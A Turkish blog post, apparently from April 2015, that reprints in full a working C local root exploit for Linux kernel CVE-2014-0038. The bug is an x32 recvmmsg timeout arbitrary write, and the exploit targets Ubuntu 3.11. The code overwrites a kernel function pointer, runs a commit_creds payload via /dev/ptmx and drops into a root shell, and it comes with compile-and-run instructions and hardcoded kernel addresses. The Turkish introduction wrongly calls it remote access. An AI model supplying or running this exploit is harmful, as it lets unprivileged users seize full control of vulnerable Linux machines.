Linux 3.4+ Arbitrary write with CONFIG_X86_X32 Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux versiyonunda uzaktan yüksek yetki erişimi root yetkisi alınabilmektedir. Açığa ilişkin exploit aşağıdaki gibidir.
001
002
003
004
005
006
007
008
009
010
011
012
013
014
015
016
017
018
019
020
021
022
023
024
025
026
027
028
029
030
031
032
033
034
035
036
037
038
039
040
041
042
043
044
045
046
047
048
049
050
051
052
053
054
055
056
057
058
059
060
061
062
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
/*
 * Local root exploit for CVE-2014-0038.
 *
 * https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c
 *
 * Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer
 * passed from userspace.
 *
 * Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg,
 * if the original byte at that address is known it can be overwritten
 * with known data.
 * If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00.
 *
 * Restrictions: The first long at the passed address (tv_sec) has to be positive
 * and the second long (tv_nsec) has to be smaller than 1000000000.
 *
 * Overview: Target the release function pointer of the ptmx_fops structure located in
 * non initialized (and thus writable) kernel memory. Zero out the three most
 * significant bytes and thus turn it into a pointer to an address mappable in
 * user space.
 * The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec
 * is valid).
 * Open /dev/ptmx, close it and enjoy.
 *
 * Not very beautiful but should be fairly reliable if symbols can be resolved.
 *
 * Tested on Ubuntu 13.10
 *
 * gcc timeoutpwn.c -o pwn && ./pwn
 *
 * Written by saelo
 */
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/mman.h>
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define BUFSIZE 200
#define PAYLOADSIZE 0x2000
#define FOPS_RELEASE_OFFSET 13*8
/*
 * Adapt these addresses for your need.
 * see /boot/System.map* or /proc/kallsyms
 * These are the offsets from ubuntu 3.11.0-12-generic.
 */
#define PTMX_FOPS           0xffffffff81fb30c0LL
#define TTY_RELEASE         0xffffffff8142fec0LL
#define COMMIT_CREDS        0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
/*
 * Match signature of int release(struct inode*, struct file*).
 *
 * See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz
 */
int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
    _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
    _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
    *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;    // restore pointer
    commit_creds(prepare_kernel_cred(0));
    return -1;
}
/*
 * Write a zero to the byte at then given address.
 * Only works if the current value is 0xff.
 */
void zero_out(long addr)
{
    int sockfd, retval, port, pid, i;
    struct sockaddr_in sa;
    char buf[BUFSIZE];
    struct mmsghdr msgs;
    struct iovec iovecs;
    srand(time(NULL));
    port = 1024 + (rand() % (0x10000 - 1024));
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(EXIT_FAILURE);
    }
    sa.sin_family      = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port        = htons(port);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }
    memset(&msgs, 0, sizeof(msgs));
    iovecs.iov_base         = buf;
    iovecs.iov_len          = BUFSIZE;
    msgs.msg_hdr.msg_iov    = &iovecs;
    msgs.msg_hdr.msg_iovlen = 1;
    /*
     * start a seperate process to send a udp message after 255 seconds so the syscall returns,
     * but not after updating the timout struct and writing the remaining time into it.
     * 0xff - 255 seconds = 0x00
     */
    printf("clearing byte at 0x%lxn", addr);
    pid = fork();
    if (pid == 0) {
        memset(buf, 0x41, BUFSIZE);
        if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
            perror("socket()");
            exit(EXIT_FAILURE);
        }
        sa.sin_family      = AF_INET;
        sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        sa.sin_port        = htons(port);
        printf("waiting 255 seconds...n");
        for (i = 0; i < 255; i++) {
        if (i % 10 == 0)
                printf("%is/255sn", i);
        sleep(1);
        }
        printf("waking up parent...n");
        sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));
        exit(EXIT_SUCCESS);
    } else if (pid > 0) {
        retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);
        if (retval == -1) {
            printf("address can't be written to, not a valid timespec structn");
            exit(EXIT_FAILURE);
        }
        waitpid(pid, 0, 0);
        printf("byte zeroed outn");
    } else {
      perror("fork()");
      exit(EXIT_FAILURE);
    }
}
int main(int argc, char** argv)
{
    long code, target;
    int pwn;
    /* Prepare payload... */
    printf("preparing payload buffer...n");
    code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
    memset((void*)code, 0x90, PAYLOADSIZE);
    code += PAYLOADSIZE - 1024;
    memcpy((void*)code, &kernel_payload, 1024);
    /*
     * Now clear the three most significant bytes of the fops pointer
     * to the release function.
     * This will make it point into the memory region mapped above.
     */
    printf("changing kernel pointer to point into controlled buffer...n");
    target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
    zero_out(target + 7);
    zero_out(target + 6);
    zero_out(target + 5);
    /* ... and trigger. */
    printf("releasing file descriptor to call manipulated pointer in kernel mode...n");
    pwn = open("/dev/ptmx", 'r');
    close(pwn);
    if (getuid() != 0) {
        printf("failed to get root :(n");
        exit(EXIT_FAILURE);
    }
    printf("got root, enjoy :)n");
    return execl("/bin/bash", "-sh", NULL);
}
Local Exploits | Ubuntu Local root exploit
173 Okunma 17 Nis 2015

Yorumlar


Sen de Yorumla!